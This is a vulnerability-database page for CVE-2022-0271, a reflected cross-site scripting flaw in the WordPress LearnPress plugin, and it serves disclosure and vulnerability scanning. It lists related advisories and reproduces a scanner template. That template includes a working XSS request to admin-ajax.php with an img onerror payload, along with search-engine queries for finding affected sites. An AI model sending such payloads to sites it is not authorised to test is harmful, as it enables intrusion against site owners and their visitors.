Vulners
Lucene search
LearnPress <4.1.6 - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2022-0271 | 11 Apr 202215:15 | – | attackerkb |
 | The vulnerability of the LearnPress plugin of the WordPress content management system allows a hacker to carry out XSS attacks. | 15 Nov 202300:00 | – | bdu_fstec |
 | CVE-2022-0271 | 11 Apr 202218:16 | – | circl |
 | WordPress plugin LearnPress 跨站脚本漏洞 | 11 Apr 202200:00 | – | cnnvd |
 | WordPress LearnPress plugin跨站脚本漏洞 | 13 Apr 202200:00 | – | cnvd |
 | CVE-2022-0271 | 11 Apr 202214:40 | – | cve |
 | CVE-2022-0271 LearnPress < 4.1.6 - Reflected Cross-Site Scripting | 11 Apr 202214:40 | – | cvelist |
 | EUVD-2022-15450 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-0271 | 11 Apr 202215:15 | – | nvd |
 | WordPress LearnPress Plugin < 4.1.6 XSS Vulnerability | 27 Apr 202200:00 | – | openvas |
10
id: CVE-2022-0271
info:
name: LearnPress <4.1.6 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: |
Upgrade LearnPress to version 4.1.6 or later to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271
- https://nvd.nist.gov/vuln/detail/cve-2022-0271
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0271
cwe-id: CWE-79
epss-score: 0.02213
epss-percentile: 0.8037
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: thimpress
product: learnpress
framework: wordpress
shodan-query: http.html:/wp-content/plugins/learnpress
fofa-query: body=/wp-content/plugins/learnpress
publicwww-query: /wp-content/plugins/learnpress
tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress,vuln
http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"dismissed":"xxx<img src=x onerror=alert(document.domain)>"}'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a0046304402204038f7bb249f8d905c8b12e2f17d1e1592673ca49bd97a208a73db83679d94a10220509f57f4a301541efb518009708c9f4d9b4087a96366c99b6b4ef2cd9dfc2dc6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 3.16.1
EPSS0.02213